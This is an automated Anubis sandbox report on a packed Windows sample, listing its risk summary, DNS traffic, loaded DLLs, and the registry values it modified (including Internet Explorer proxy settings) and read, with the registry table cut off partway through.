Anubis - Analysis Report

Analysis Report for 8fc59226f4be149b0f869f7e59d32214


Summary:

Description  Risk
Changes security settings of Internet Explorer: This system alteration could seriously affect the safety of browsing the World Wide Web.  medium
Performs File Modification and Destruction: The executable modifies and destroys files which are not temporary.  high
Spawns Processes: The executable creates processes during execution.  low
Performs Registry Activities: The executable reads and modifies registry values. It may also create and monitor registry keys.  low


Table of Contents


1. General Information

  - Information about Anubis' invocation  
Time needed: 241 s 
Report created: 07/01/09, 08:02:07 UTC 
Termination reason: Timeout 
Program version: 1.68.0 

1.a) - Network Activity

  -  Unknown UDP Traffic:  
from ANUBIS:1025 to 192.168.0.1:53
State: Normal establishment and termination - Transferred outbound Bytes: 32 - Transferred inbound Bytes: 116
from ANUBIS:1025 to 192.168.0.1:53
State: Normal establishment and termination - Transferred outbound Bytes: 64 - Transferred inbound Bytes: 232

2. sample.exe

  - General information about this executable  
Analysis Reason: Primary Analysis Subject 
Filename: sample.exe 
MD5: 8fc59226f4be149b0f869f7e59d32214 
SHA-1: 20978d7e476fc972127e77e14c44f5c98be1b348 
File Size: 9216 Bytes
Command Line: "C:\sample.exe" 
Process-status at analysis end: dead 
Exit Code:

  - Load-time Dlls  
Module Name  Base Address  Size
C:\WINDOWS\system32\ntdll.dll  0x7C900000  0x000AF000
C:\WINDOWS\system32\kernel32.dll  0x7C800000  0x000F6000
C:\WINDOWS\system32\gdi32.dll  0x77F10000  0x00049000
C:\WINDOWS\system32\USER32.dll  0x7E410000  0x00091000
C:\WINDOWS\system32\msvcrt.dll  0x77C10000  0x00058000
C:\WINDOWS\system32\IMM32.DLL  0x76390000  0x0001D000
C:\WINDOWS\system32\ADVAPI32.dll  0x77DD0000  0x0009B000
C:\WINDOWS\system32\RPCRT4.dll  0x77E70000  0x00092000
C:\WINDOWS\system32\Secur32.dll  0x77FE0000  0x00011000

  - Run-time Dlls  
Module Name  Base Address  Size
C:\WINDOWS\system32\Normaliz.dll  0x00860000  0x00009000
C:\WINDOWS\system32\iertutil.dll  0x42990000  0x00045000
C:\WINDOWS\system32\WININET.dll  0x42C10000  0x000CF000
C:\WINDOWS\system32\urlmon.dll  0x42CF0000  0x00127000
C:\WINDOWS\system32\NETAPI32.dll  0x5B860000  0x00055000
C:\WINDOWS\system32\comctl32.dll  0x5D090000  0x0009A000
C:\WINDOWS\system32\hnetcfg.dll  0x662B0000  0x00058000
C:\WINDOWS\System32\mswsock.dll  0x71A50000  0x0003F000
C:\WINDOWS\System32\wshtcpip.dll  0x71A90000  0x00008000
C:\WINDOWS\system32\WS2HELP.dll  0x71AA0000  0x00008000
C:\WINDOWS\system32\ws2_32.dll  0x71AB0000  0x00017000
C:\WINDOWS\system32\sensapi.dll  0x722B0000  0x00005000
C:\WINDOWS\system32\DDRAW.dll  0x73760000  0x0004B000
C:\WINDOWS\system32\DCIMAN32.dll  0x73BC0000  0x00006000
C:\WINDOWS\system32\MSCTF.dll  0x74720000  0x0004C000
C:\WINDOWS\system32\USERENV.dll  0x769C0000  0x000B4000
C:\WINDOWS\system32\WINMM.dll  0x76B40000  0x0002D000
C:\WINDOWS\system32\rtutils.dll  0x76E80000  0x0000E000
C:\WINDOWS\system32\rasman.dll  0x76E90000  0x00012000
C:\WINDOWS\system32\TAPI32.dll  0x76EB0000  0x0002F000
C:\WINDOWS\system32\RASAPI32.dll  0x76EE0000  0x0003C000
C:\WINDOWS\system32\DNSAPI.dll  0x76F20000  0x00027000
C:\WINDOWS\system32\rasadhlp.dll  0x76FC0000  0x00006000
C:\WINDOWS\system32\CLBCATQ.DLL  0x76FD0000  0x0007F000
C:\WINDOWS\system32\COMRes.dll  0x77050000  0x000C5000
C:\WINDOWS\system32\OLEAUT32.dll  0x77120000  0x0008B000
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll  0x773D0000  0x00103000
C:\WINDOWS\system32\ole32.dll  0x774E0000  0x0013D000
C:\WINDOWS\system32\SETUPAPI.dll  0x77920000  0x000F3000
C:\WINDOWS\system32\Apphelp.dll  0x77B40000  0x00022000
C:\WINDOWS\system32\VERSION.dll  0x77C00000  0x00008000
C:\WINDOWS\system32\SHLWAPI.dll  0x77F60000  0x00076000
C:\WINDOWS\system32\SHELL32.dll  0x7C9C0000  0x00817000

  - SigBuster Output  
UPX All_Versions SN:1634

2.a) sample.exe - Registry Activities

  - Registry Values Modified:  
Key  Name  New Value
HKLM\SYSTEM\CURRENTCONTROLSET\HARDWARE PROFILES\CURRENT\Software\Microsoft\windows\CurrentVersion\Internet Settings  info ProxyEnable
HKLM\Software\Microsoft\DirectDraw\MostRecentApplication  ID  1246043257
HKLM\Software\Microsoft\DirectDraw\MostRecentApplication  Name  sample.exe
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders  Common AppData  C:\Documents and Settings\All Users\Application Data
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders  Common Desktop  C:\Documents and Settings\All Users\Desktop
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders  Common Documents  C:\Documents and Settings\All Users\Documents
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d14d83ce-7d74-11dc-97e2-806d6172696f}\  BaseClass  Drive
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d14d83cf-7d74-11dc-97e2-806d6172696f}\  BaseClass  Drive
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders  AppData  C:\Documents and Settings\user\Application Data
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders  Cache  C:\Documents and Settings\user\Local Settings\Temporary Internet Files
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders  Cookies  C:\Documents and Settings\user\Cookies
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders  Desktop  C:\Documents and Settings\user\Desktop
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders  History  C:\Documents and Settings\user\Local Settings\History
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders  Personal  C:\Documents and Settings\user\My Documents
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\  info AutoDetect
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\  info IntranetName
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\  info ProxyBypass
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\  info UNCAsIntranet
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings  info MigrateProxy
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings  info ProxyEnable
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections  info SavedLegacySettings  0x460000006800000001000000000000000000000000000000040000000000

  - Registry Values Read:  
Key  Name  Value  Times
HKLM\SOFTWARE\CLASSES\.ADE    Access.ADEFile.11
HKLM\SOFTWARE\CLASSES\.ADP    Access.Project.11
HKLM\SOFTWARE\CLASSES\.ASP    aspfile
HKLM\SOFTWARE\CLASSES\.BAT    batfile
HKLM\SOFTWARE\CLASSES\.CER    CERFile
HKLM\SOFTWARE\CLASSES\.CHM    chm.file
HKLM\SOFTWARE\CLASSES\.CMD    cmdfile
HKLM\SOFTWARE\CLASSES\.COM    comfile
HKLM\SOFTWARE\CLASSES\.CPL    cplfile
HKLM\SOFTWARE\CLASSES\.CRT    CERFile
HKLM\SOFTWARE\CLASSES\.EXE    exefile
HKLM\SOFTWARE\CLASSES\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\INPROCSERVER32    %SystemRoot%\system32\SHELL32.dll
HKLM\SOFTWARE\CLASSES\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\INPROCSERVER32    C:\WINDOWS\system32\urlmon.dll
HKLM\SOFTWARE\CLASSES\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\INPROCSERVER32  ThreadingModel  Both
HKLM\SOFTWARE\CLASSES\CLSID\{AEB6717E-7E19-11D0-97EE-00C04FD91972}\INPROCSERVER32    shell32.dll
HKLM\SOFTWARE\CLASSES\DIRECTORY  AlwaysShowExt
HKLM\SOFTWARE\CLASSES\DRIVE\SHELLEX\FOLDEREXTENSIONS\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}  DriveMask  32
HKLM\SOFTWARE\CLASSES\EXEFILE\SHELL\OPEN\COMMAND    "%1" %*
HKLM\SOFTWARE\CLASSES\MIME\DATABASE\CONTENT TYPE\TEXT/HTML  Extension  .htm  16
HKLM\SOFTWARE\CLASSES\MIME\DATABASE\CONTENT TYPE\TEXT/PLAIN  Extension  .txt
HKLM\SOFTWARE\Microsoft\CTF\SystemShared\  CUAS
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings  EnablePunycode
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings  UrlEncoding  0x00000000
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform  .NET CLR 1.1.4322
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform  .NET CLR 2.0.50727
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform  .NET CLR 3.0.04506.30
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform  InfoPath.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\UA Tokens
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\UA Tokens  MSN 2.0
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\UA Tokens  MSN 2.5
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager  CriticalSectionTimeout  2592000
HKLM\SYSTEM\CurrentControlSet\Services\Winsock\Parameters  Transports  0x5400630070006900700000004e0065007400420049004f00530000000000
HKLM\SYSTEM\Setup  OsLoaderPath  \
HKLM\SYSTEM\Setup  SystemPartition  \Device\HarddiskVolume1
HKLM\SYSTEM\Setup  SystemSetupInProgress
HKLM\SYSTEM\WPA\MediaCenter  Installed
HKLM\Software\Microsoft\COM3  Com+Enabled
HKLM\Software\Microsoft\COM3  REGDBVersion  0x0f00000000000000
HKLM\Software\Microsoft\DirectDraw\Compatibility\Bug!  Flags  0x01000000
HKLM\Software\Microsoft\DirectDraw\Compatibility\Bug!  ID  0x3d620932
HKLM\Software\Microsoft\DirectDraw\Compatibility\Bug!  Name  BUG!.EXE
HKLM\Software\Microsoft\DirectDraw\Compatibility\DemolitionDerby2  Flags  0x01000000
HKLM\Software\Microsoft\DirectDraw\Compatibility\DemolitionDerby2  ID  0x44838832
HKLM\Software\Microsoft\DirectDraw\Compatibility\DemolitionDerby2  Name  DD2.EXE
HKLM\Software\Microsoft\DirectDraw\Compatibility\MortalKombat3  Flags  0x01000000
HKLM\Software\Microsoft\DirectDraw\Compatibility\MortalKombat3  ID  0xfc6de731
HKLM\Software\Microsoft\DirectDraw\Compatibility\MortalKombat3  Name  MK3W.EXE
HKLM\Software\Microsoft\DirectDraw\Compatibility\MsGolf98  Flags  0x20000000
HKLM\Software\Microsoft\DirectDraw\Compatibility\MsGolf98  ID  0x0dea1a35
HKLM\Software\Microsoft\DirectDraw\Compatibility\MsGolf98  Name  game.exe
HKLM\Software\Microsoft\DirectDraw\Compatibility\NHLPowerPlay  Flags  0x01000000
HKLM\Software\Microsoft\DirectDraw\Compatibility\NHLPowerPlay  ID  0xff3fbf31
HKLM\Software\Microsoft\DirectDraw\Compatibility\NHLPowerPlay  Name  PP96.EXE
HKLM\Software\Microsoft\DirectDraw\Compatibility\NortonSystemInfo  Flags  0x04000000
HKLM\Software\Microsoft\DirectDraw\Compatibility\NortonSystemInfo  ID  0x29ea6332
HKLM\Software\Microsoft\DirectDraw\Compatibility\NortonSystemInfo  Name  SI32.EXE
HKLM\Software\Microsoft\DirectDraw\Compatibility\Rogue Squadron  Flags  0x40000000
HKLM\Software\Microsoft\DirectDraw\Compatibility\Rogue Squadron  ID  0xd1d74c36
HKLM\Software\Microsoft\DirectDraw\Compatibility\Rogue Squadron  Name  ROGUE SQUADRON.EXE
HKLM\Software\Microsoft\DirectDraw\Compatibility\Savage  Flags  0x01000000
HKLM\Software\Microsoft\DirectDraw\Compatibility\Savage  ID  0x00876531
HKLM\Software\Microsoft\DirectDraw\Compatibility\Savage  Name  SAVAGE32.EXE
HKLM\Software\Microsoft\DirectDraw\Compatibility\ScorchedPlanet  Flags  0x02000000
HKLM\Software\Microsoft\DirectDraw\Compatibility\ScorchedPlanet  ID  0x69044c32
HKLM\Software\Microsoft\DirectDraw\Compatibility\ScorchedPlanet  Name  SPLANETW.EXE
HKLM\Software\Microsoft\DirectDraw\Compatibility\SilentThunder  Flags  0x01000000
HKLM\Software\Microsoft\DirectDraw\Compatibility\SilentThunder  ID  ] 5V
HKLM\Software\Microsoft\DirectDraw\Compatibility\SilentThunder  Name  A10SIM.EXE
HKLM\Software\Microsoft\DirectDraw\Compatibility\Terracide  Flags  0x04000000
HKLM\Software\Microsoft\DirectDraw\Compatibility\Terracide  ID  0x66cb9533
HKLM\Software\Microsoft\DirectDraw\Compatibility\Terracide  Name  TERAWIN.EXE
HKLM\Software\Microsoft\DirectDraw\Compatibility\ThirdDimension  Flags  0x04000000
HKLM\Software\Microsoft\DirectDraw\Compatibility\ThirdDimension  ID  0xbf817f32
HKLM\Software\Microsoft\DirectDraw\Compatibility\ThirdDimension  Name  t3rd.EXE
HKLM\Software\Microsoft\DirectDraw\Compatibility\ZiffDavisQualityBenchmark  Flags  0x04000000
HKLM\Software\Microsoft\DirectDraw\Compatibility\ZiffDavisQualityBenchmark  ID  m[M3
HKLM\Software\Microsoft\DirectDraw\Compatibility\ZiffDavisQualityBenchmark  Name  BEND3DIM.EXE
HKLM\Software\Microsoft\DirectDraw\Compatibility\ZiffDavisWinMarkBenchmark  Flags  0x04000000
HKLM\Software\Microsoft\DirectDraw\Compatibility\ZiffDavisWinMarkBenchmark  ID  0x46fc4b33
HKLM\Software\Microsoft\DirectDraw\Compatibility\ZiffDavisWinMarkBenchmark  Name  WBD3D.EXE
HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BEHAVIORS
HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_MK_PROTOCOL
HKLM\Software\Microsoft\Tracing  EnableConsoleTracing
HKLM\Software\Microsoft\Tracing\RASAPI32  ConsoleTracingMask  4294901760
HKLM\Software\Microsoft\Tracing\RASAPI32  EnableConsoleTracing
HKLM\Software\Microsoft\Tracing\RASAPI32  EnableFileTracing
HKLM\Software\Microsoft\Tracing\RASAPI32  FileDirectory  %windir%\tracing
HKLM\Software\Microsoft\Tracing\RASAPI32  FileTracingMask  4294901760
HKLM\Software\Microsoft\Tracing\RASAPI32  MaxFileSize  1048576
HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList  AllUsersProfile  All Users  11
HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList  DefaultUserProfile  Default User  11
HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList  ProfilesDirectory  %SystemDrive%\Documents and Settings  22
HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1229272821-1004336348-527237240-1003  CentralProfile
HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1229272821-1004336348-527237240-1003  Flags
HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1229272821-1004336348-527237240-1003  ProfileImagePath  %SystemDrive%\Documents and Settings\user  12
HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1229272821-1004336348-527237240-1003  ProfileLoadTimeHigh  29931941
HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1229272821-1004336348-527237240-1003  ProfileLoadTimeLow  1446385964
HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1229272821-1004336348-527237240-1003  State  256
HKLM\Software\Microsoft\Windows\CurrentVersion  CommonFilesDir  C:\Program Files\Common Files  11
HKLM\Software\Microsoft\Windows\CurrentVersion  DevicePath  %SystemRoot%\inf
HKLM\Software\Microsoft\Windows\CurrentVersion  ProgramFilesDir  C:\Program Files  11
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks  {AEB6717E-7E19-11d0-97EE-00C04FD91972}
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders  Common AppData  %ALLUSERSPROFILE%\Application Data
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders  Common Desktop  %ALLUSERSPROFILE%\Desktop
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders  Common Documents  %ALLUSERSPROFILE%\Documents
HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content  PerUserItem
HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies  PerUserItem
HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History  PerUserItem
HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\\msn.com
HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\\msn.com\related  http
HKLM\Software\Microsoft\Windows\CurrentVersion\Setup  DriverCachePath  %SystemRoot%\Driver Cache
HKLM\Software\Microsoft\Windows\CurrentVersion\Setup  LogLevel
HKLM\Software\Microsoft\Windows\CurrentVersion\Setup  ServicePackCachePath  c:\windows\ServicePackFiles\ServicePackCache
HKLM\Software\Microsoft\Windows\CurrentVersion\Setup  ServicePackSourcePath  c:\windows\ServicePackFiles
HKLM\Software\Microsoft\Windows\CurrentVersion\Setup  SourcePath  D:\
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers  AuthenticodeEnabled
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers  DefaultLevel  262144
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers  PolicyScope
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers  TransparentEnabled
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}  HashAlg  32771
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}  ItemData  0x5eab304f957a49896a006c1c31154015
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}  ItemSize  779
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}  SaferFlags
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  HashAlg  32771
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  ItemData  0x67b0d48b343a3fd3bce9dc646704f394
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  ItemSize  517
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  SaferFlags
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  HashAlg  32771
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  ItemData  0x327802dcfef8c893dc8ab006dd847d1d
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  ItemSize  918
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  SaferFlags
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}  HashAlg  32771
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}  ItemData  0xbd9a2adb42ebd8560e250e4df8162f67
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}  ItemSize  229
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}  SaferFlags
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  HashAlg  32771
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  ItemData  0x386b085f84ecf669d36b956a22c01e80
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  ItemSize  370
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  SaferFlags
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33}  ItemData  %HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache%OLK*
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33}  SaferFlags
HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName  ComputerName  USER  13
HKLM\System\CurrentControlSet\Control\MediaProperties\PrivateProperties\Joystick\Winmm  wheel
HKLM\System\CurrentControlSet\Control\ProductOptions  ProductType  WinNT
HKLM\System\CurrentControlSet\Control\Session Manager\Environment  ComSpec  %SystemRoot%\system32\cmd.exe  22
HKLM\System\CurrentControlSet\Control\Session Manager\Environment  FP_NO_HOST_CHECK  NO  22
HKLM\System\CurrentControlSet\Control\Session Manager\Environment  NUMBER_OF_PROCESSORS  22
HKLM\System\CurrentControlSet\Control\Session Manager\Environment  OS  Windows_NT  22
HKLM\System\CurrentControlSet\Control\Session Manager\Environment  PATHEXT  .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH  22
HKLM\System\CurrentControlSet\Control\Session Manager\Environment  PROCESSOR_ARCHITECTURE  x86  22
HKLM\System\CurrentControlSet\Control\Session Manager\Environment  PROCESSOR_IDENTIFIER  x86 Family 6 Model 3 Stepping 3, GenuineIntel  22
HKLM\System\CurrentControlSet\Control\Session Manager\Environment  PROCESSOR_LEVEL  22
HKLM\System\CurrentControlSet\Control\Session Manager\Environment  PROCESSOR_REVISION  0303  22
HKLM\System\CurrentControlSet\Control\Session Manager\Environment  Path  %SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem  22
HKLM\System\CurrentControlSet\Control\Session Manager\Environment  TEMP  %SystemRoot%\TEMP  22
HKLM\System\CurrentControlSet\Control\Session Manager\Environment  TMP  %SystemRoot%\TEMP  22
HKLM\System\CurrentControlSet\Control\Session Manager\Environment  windir  %SystemRoot%  22
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters  Domain
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters  Hostname  user
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters  UseDomainNameDevolution
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock  HelperDllName  %SystemRoot%\System32\wshtcpip.dll
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock  Mapping  0x0b0000000300000002000000010000000600000002000000010000000000
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock  MaxSockaddrLength  16
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock  MinSockaddrLength  16
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock  UseDelayedAcceptance
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters  WinSock_Registry_Version  2.0
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5  Num_Catalog_Entries
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5  Serial_Access_Num
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001  DisplayString  Tcpip
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001  Enabled
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001  LibraryPath  %SystemRoot%\System32\mswsock.dll
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001  ProviderId  0x409d05229e7ecf11ae5a00aa00a7112b
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001  StoresServiceClassInfo
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001  SupportedNameSpace  12
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001  Version
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002  DisplayString  NTDS
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002  Enabled
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002  LibraryPath  %SystemRoot%\System32\winrnr.dll
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002  ProviderId  0xee37263b80e5cf11a55500c04fd8d4ac
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002  StoresServiceClassInfo
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002  SupportedNameSpace  32
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002  Version
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003  DisplayString  Network Location Awareness (NLA) Namespace
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003  Enabled
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003  LibraryPath  %SystemRoot%\System32\mswsock.dll
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003  ProviderId  0x3a244266a83ba64abaa52e0bd71fdd83
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003  StoresServiceClassInfo
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003  SupportedNameSpace  15
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003  Version
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9  Next_Catalog_Entry_ID  1012
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9  Num_Catalog_Entries  11
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9  Serial_Access_Num
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001  PackedCatalogItem  %SystemRoot%\system32\mswsock.
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002  PackedCatalogItem  %SystemRoot%\system32\mswsock.
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003  PackedCatalogItem  %SystemRoot%\system32\mswsock.
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004  PackedCatalogItem  %SystemRoot%\system32\rsvpsp.d
